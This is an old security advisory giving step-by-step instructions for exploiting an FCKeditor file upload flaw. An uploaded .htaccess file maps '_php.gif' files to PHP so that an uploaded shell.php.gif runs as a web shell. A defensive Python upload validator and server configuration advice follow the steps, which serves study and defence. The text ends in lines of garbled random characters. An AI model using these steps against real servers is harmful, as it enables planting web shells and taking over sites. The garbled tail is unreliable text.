FCKeditor Upload vulnerability in all PHP versions
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
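The steps above show that renaming shell.php.gif to shell_php.gif is no defence once an uploaded .htaccess maps the "_php.gif" suffix to the PHP handler. The validator below is an added example, not FCKeditor's own code: it models that weak rename beside a hardened upload check that rejects .htaccess and other dotfiles, path separators, double extensions, and content that is not the image it claims to be. The extension allowlist and the blocked-name set are assumptions chosen for the example.

```python
import re

# Assumed allowlist for an image upload endpoint (not taken from the advisory).
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png"}
# Server configuration files that must never be writable through an upload path.
BLOCKED_NAMES = {".htaccess", ".htpasswd", "web.config"}
GIF_MAGIC = (b"GIF87a", b"GIF89a")


def legacy_rename(filename: str) -> str:
    """Model of the weak rename the advisory describes: every dot except the
    last becomes an underscore, so 'shell.php.gif' -> 'shell_php.gif'.
    The bytes are untouched, so a handler mapping for '_php.gif' still
    executes the file as PHP."""
    stem, _, ext = filename.rpartition(".")
    return f"{stem.replace('.', '_')}.{ext}" if stem else filename


def hardened_check(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an upload.

    Rejects anything that is not exactly <plain-stem>.<allowed-ext>, any
    dotfile or known server config name, and content whose bytes do not
    match the claimed image type or that carries a PHP open tag."""
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if base != filename:
        return False, "path separator in filename"
    if base.lower() in BLOCKED_NAMES or base.startswith("."):
        return False, "server configuration file or dotfile"
    parts = base.split(".")
    if len(parts) != 2 or not re.fullmatch(r"[A-Za-z0-9_-]+", parts[0]):
        return False, "name must be <stem>.<ext> with a plain stem"
    ext = parts[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not in allowlist"
    if ext == "gif" and not content.startswith(GIF_MAGIC):
        return False, "content is not a GIF"
    if b"<?php" in content or b"<?=" in content:
        return False, "PHP open tag found in content"
    return True, "ok"
```

Pair the check with an Apache configuration that sets AllowOverride None for the upload directory, so an uploaded .htaccess is ignored even if the filename filter is bypassed.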
6 \" x1 U; N Y
$ l+ w& m0 j2 q6 P2 K) Y+ G' c( `
. F9 h9 I4 E" v- C! J/ O |